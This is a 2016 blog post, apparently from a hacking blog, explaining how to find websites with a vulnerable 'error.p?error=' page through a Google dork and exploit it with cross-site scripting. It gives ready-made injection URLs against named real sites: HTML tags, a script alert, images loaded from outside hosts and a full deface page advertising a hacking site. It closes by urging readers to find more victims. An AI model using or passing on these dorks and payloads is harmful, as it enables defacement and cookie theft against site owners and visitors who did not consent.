Wednesday, May 18, 2016

error.p XSS (cross Site Scripting) Vulnerabilities



Title : error.p XSS
Risk : Cross site scripting, cookie Grabbing
Poc : error.p?error=
Dork : "inurl:error.p?error="
Author : Minhal Mehdi
browser : Mozilla Firefox

Lets Start Goto Google, and say hello To Google !
now type the dork "inurl:error.p?error="
in srch results ignore all the extra results with diffrent url Like : error-p-error.p
pick site with url www.site.com/error.p?error= Only
Now Type your first Tag to Check the vulnerablity
example : www.site.com/error.p?error=<h1>Test</h1>
if it will show you "Test" word in Hder tag this Its Vulnerable
I got This website from Srch results, so now see some examples :
To show Hder
http://www.sacareerfocus.co.za/error.p?error=<h1></h1>
To show hder in center
http://www.sacareerfocus.co.za/error.p?error=<center><h1></h1></center>
to show Title
http://www.sacareerfocus.co.za/error.p?error=<title></title>
to Add a
http://www.sacareerfocus.co.za/error.p?error=<img src="http://3.bp.blogspot.com/-EtkPBc32dF0/UIgFEjw-cuI/AAAAAAAABGM/eIdp8Qg0hUg/s640/s.jpg"/>
to add a Message
http://www.sacareerfocus.co.za/error.p?error=<p><b>Your Message Here<b></p>
to write message in next lines
http://www.sacareerfocus.co.za/error.p?error=<p><b>First line<br>Second Line <b></p>
To add a scrolling Text
http://www.sacareerfocus.co.za/error.p?error=<marquee>Scrolling text Here</marquee>
To Add a alert box
http://www.sacareerfocus.co.za/error.p?error=<script>alert("hello");</script>
To add background colour in page
http://www.sacareerfocus.co.za/error.p?error=<body bgcolor="red"/>
to Add a full deface Page
http://www.sacareerfocus.co.za/error.p?error=<title></title><center><h1><h1><body bgcolor="red"/><p><b>You have been <br></b></p><img src="http://t0.gstatic.com/s?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.devilscafe.in</b></marquee>

you can add more html and javscript tags here,
here is another demo site :
http://europnvaluepartneradvisors.com/error.p?error=<center><h1>www.devilscafe.in</h1></center>
find More website with dorks :)

No comments:

Post a Comment